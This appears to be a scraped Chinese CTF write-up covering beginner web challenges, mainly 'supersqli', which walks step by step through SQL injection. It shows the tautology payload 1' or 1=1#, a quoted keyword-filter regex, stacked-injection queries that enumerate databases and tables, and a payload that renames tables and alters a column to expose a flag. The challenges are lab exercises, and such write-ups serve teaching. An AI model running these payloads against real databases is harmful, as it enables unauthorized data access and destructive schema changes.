当前位置: 首页 > news >正文

网站上不去首页seo要怎么办商业网站建设规划书

网站上不去首页seo要怎么办,商业网站建设规划书,做房产网站赚钱吗,电商网站介绍inget 尝试万能钥匙。 输入?id1or11# supersqli 1.找注入点 输入框 2.判断字符型,数字型 输入1 and 11 和1 and 12,发现两次提交后页面一样,判断出为字符型注入 3.判断闭合符号 输入1,回显正常 输入1,报错 加上…

inget

尝试万能钥匙。

输入?id=1'or'1=1#

5cf58094b2ca4d4d83ab807d0e379547.png

 

supersqli

1.找注入点

输入框

44886641dfe74930a8a3b7883c116483.png

 

2.判断字符型,数字型

输入1 and 1=1 和1 and 1=2,发现两次提交后页面一样,判断出为字符型注入

 

3.判断闭合符号

 

输入1,回显正常

输入1',报错

70a2d5e7769640d987f147427bee42df.png 

 加上注释符号#或者--+或者%23(注释掉后面语句,使1后面的单引号与前面的单引号成功匹配就不会报错)页面回显正常,那么闭合符号就是单引号。

输入 1#,回显正常

 

4.判断字段数量

输入1' order by 3 # ,则2个

fee7c547da684efd888c7b3c9c42d519.png

 

5.联合注入

输入1' union select 1,2 #

a56d271dbadd4432a9c58b2281c18901.png

 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

  • select|update|delete|drop|insert|where:这部分表示匹配其中的任何一个单词。| 是一个逻辑“或”操作符,意味着它会匹配它前面的或后面的任何一个模式。
  • \.:. 在正则表达式中是一个特殊字符,代表匹配任何字符(除了换行符)。为了匹配实际的点字符.,我们需要使用 \.。
  • i:这是一个修饰符,表示匹配是不区分大小写的。
  • 代码会检查$inject字符串中是否包含“select”、“update”、“delete”、“drop”、“insert”、“where”或点.(不考虑大小写)。
  • 如果匹配到任何这些模式,preg_match会返回1,表示匹配成功。如果没有匹配到,它会返回0。
  • return 关键字表示这个函数会直接返回preg_match的结果。

本行代码是关键字过滤,且无视大小写。

通过检查用户输入(这里是 $inject )中是否包含这些可能用于构造恶意SQL语句的关键字,如果包含则可能拒绝该输入或采取其他安全措施。

 

因包含select,所以要绕过,

使用堆叠注入

输入1' ; show databases; #

3727cf21b1ce4690959fa06010fb8c4b.png

 发现supersqli数据库名和题目一样,猜测有flag

输入1';use supersqli;show tables;#

b9487afd2d7d43918e475bd17b06c114.png

 有两个表,先打开看看有什么字段

(纯数字为表名要打引号)

 

查看191,输入1';use supersqli; show columns from `1919810931114514`;#

710db14f4e744ec8baacd3421e29de56.png

发现flag。 

输入1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

  •   - 1'; :闭合前面可能存在的SQL语句,并开始注入新的恶意语句。
  •   
  •   - rename tables 'words' to 'words1'; :将名为 words 的表重命名为 words1 。
  •   
  •   - rename tables '1919810931114514' to 'words'; :将名为 1919810931114514 的表重命名为 words ,这可能是攻击者事先创建的一个表,里面可能包含恶意数据或结构。
  •   
  •   - alter table 'words' change 'flag' 'id' varchar(100); :修改 words 表(此时已经是攻击者重命名后的表)中名为 flag 的列,将其重命名为 id ,并将数据类型设置为 varchar(100) 。这样做可能是为了隐藏真正的 flag 列,或者是为了后续的操作做准备,比如将恶意数据插入到该列中。
  •   
  •   - # :注释掉后面可能存在的其他SQL代码,确保注入的语句能够完整执行

  在SQL中, rename 用于更改对象的名称。

本行代码中已知表 words 为查询的默认表,则可以利用 rename 关键字将 表word改名为words,并将表 1919810931114514改名为 word,这样默认查询的表就变成了原先的 表1919810931114514,并将列 flag 改为 id,这样进行查询,用万能语句,得到flag

1' or 1=1#

f478b8a73a2c4444a00873ee0656875b.png

 

get_post

用GET方式,直接在URL输入?a=1

84386f2556c144e6adc982d92026ffd9.png

 

用POST方式,点post data,输入b=2

94d4a13ce24145ed9c2d24d855c0a87a.png

 

 

NewsCenter

(题目加载不出来,就只看了看别人的博客)

http://www.yayakq.cn/news/574543/

相关文章:

  • 做外贸可以用哪些网站仿uehtml WordPress
  • 保定学校网站建设php 网站 发布
  • 手机排名哪个网站最权威wordpress js图片
  • 深圳大型商城网站建设建立了公司门户网站
  • 做维修广告在哪个网站查询建设工程规范的网站
  • 上海网站建设广告语手机网站如何做营销
  • 上海加盟网站建设高端网吧设备
  • 优秀的电子商务网站wordpress页面文字的样式
  • 一站式做网站服务南阳网站seo顾问
  • 安卓盒子 做网站网站建设是半年的持久战
  • 企业网站开发心得体会南充网站建设网站
  • 网站开发 开源wordpress 主题 her
  • 网站图片设置方法wordpress流行漏洞
  • 营销网站型建设多少钱网站建设合同细节
  • 网站后台哪些功能需要前端配合企业网站开发教学
  • 网站建设财务项目管理制度网站详情怎么做的
  • 公司的网站设计方案郴州网红景点
  • 品牌网站建设 d磐石网络php 微网站开发
  • 深圳手机模板建站wordpress 更新慢
  • 石家庄网站优化多少钱深圳龙华鸿宇大厦网站建设
  • 怎么讲解网站建工教育网校官方网站
  • 国际网站模板佛山市骏域网站建设专家
  • 网络服务公司简介神马seo排名关键词点击
  • 手机企业网站多少钱加强公司门户网站建设
  • 中山做营销型网站久免费域名注册网站
  • dreamware做网站建筑设计私活平台
  • vi设计与网站建设招标文件织梦网站关键词
  • 优化网站首页《民用建筑通用规范》
  • 网站正在建设中末班如何做教育公司网站
  • 证券投资网站建设网站制作验收单